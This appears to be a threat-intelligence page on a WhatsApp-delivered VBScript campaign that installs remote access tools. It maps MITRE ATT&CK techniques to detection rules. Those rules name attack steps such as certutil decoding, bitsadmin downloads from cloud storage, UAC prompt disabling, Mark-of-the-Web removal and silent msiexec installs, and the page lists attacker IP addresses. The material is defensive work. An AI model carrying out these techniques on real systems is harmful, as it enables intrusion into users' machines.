
WhatsApp VBScript RMM Campaign
Indicators of Compromise
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
Remediation / Detections
Source: attack.mitre.org
Technique ID | Technique Name | Detection ID | Detection Name | Recommended Detection Action |
|---|---|---|---|---|
Phishing: Spearphishing via Service | DET0115 | Detection Strategy for Spearphishing via a Service | Monitor messaging platform API logs and endpoint telemetry for VBScript files delivered via WhatsApp Desktop or WhatsApp Web processes. | |
User Execution: Malicious File | DET0294 | User Execution – Malicious File | Alert on WScript.exe or CScript.exe spawned by WhatsApp.Root.exe, explorer.exe, or browsers opening files from the Downloads directory. | |
Command and Scripting Interpreter: Visual Basic | DET0076 | Behavioral Detection of Visual Basic Execution | Detect WScript.exe executing .vbs/.vbe files from C:\Users\Public\Documents\ or user temp directories; flag multi-stage download chains. | |
Command and Scripting Interpreter: PowerShell | DET0455 | Abuse of PowerShell for Arbitrary Execution | Alert on PowerShell invoked by VBScript (WScript.exe → powershell.exe) performing file download operations. | |
Ingress Tool Transfer | DET0060 | Detect Ingress Tool Transfers via Behavioral Chain | Monitor for curl.exe, bitsadmin.exe, or certutil.exe spawned by scripting engines downloading content from cloud storage buckets (S3, Alibaba OSS, Backblaze). | |
Deobfuscate/Decode Files or Information | DET0275 | Detect Adversary Deobfuscation or Decoding | Detect certutil -decode or PowerShell Base64 decode operations performed by WScript child processes. | |
Obfuscated Files or Information | DET0378 | Behavioral Detection of Obfuscated Files or Information | Flag VBScript files with excessive string concatenation, randomized variable names, or entropy anomalies indicative of heavy obfuscation. | |
Masquerading: Masquerade File Type | DET0226 | Detection Strategy for Masquerading via File Type Modification | Alert on file rename operations that change extensions from .pdf or .txt to .vbs performed by scripting engine child processes. | |
BITS Jobs | DET0098 | Detect abuse of Windows BITS Jobs | Monitor BitsTransfer or bitsadmin.exe download jobs created by WScript.exe; alert on BITS jobs targeting non-corporate cloud storage domains. | |
Subvert Trust Controls: Mark-of-the-Web Bypass | DET0257 | Detect Mark-of-the-Web (MOTW) Bypass | Monitor for deletion of Zone.Identifier alternate data streams from files extracted by Shell.Application CopyHere method. | |
Abuse Elevation Control Mechanism: Bypass UAC | DET0388 | Detection Strategy for Bypass User Account Control (UAC) | Alert on repeated registry modification attempts targeting HKLM\...\Policies\System\ConsentPromptBehaviorAdmin via runas-elevated ShellExecute calls. | |
Modify Registry | DET0280 | Behavior-Based Registry Modification Detection on Windows | Monitor registry writes to ConsentPromptBehaviorAdmin; alert on any change to a value of 0 (no prompt) by non-administrative processes. | |
Hide Artifacts: Hidden Files and Directories | DET0032 | Detection Strategy for Hidden Files and Directories | Detect creation of directories under C:\Users\Public\Documents\ with hidden and system attributes set by scripting engine processes. | |
System Binary Proxy Execution: Msiexec | DET0158 | Detection of Msiexec Abuse | Alert on msiexec.exe invoked silently (/qn) by WScript.exe or cmd.exe to install UEMSAgent.msi or other non-IT-approved MSI packages. | |
Web Service | DET0425 | Suspicious Use of Web Services for C2 | Detect outbound HTTP/HTTPS connections from WScript child processes to S3, Alibaba OSS (aliyuncs.com), or Backblaze B2 endpoints. | |
Remote Access Tools | DET0496 | Behavior-Chain Detection for Remote Access Tools | Monitor for ManageEngine Endpoint Central agent registration beaconing to the 202.61.160.0/24 subnet or 38.55.151.63 not initiated by IT. |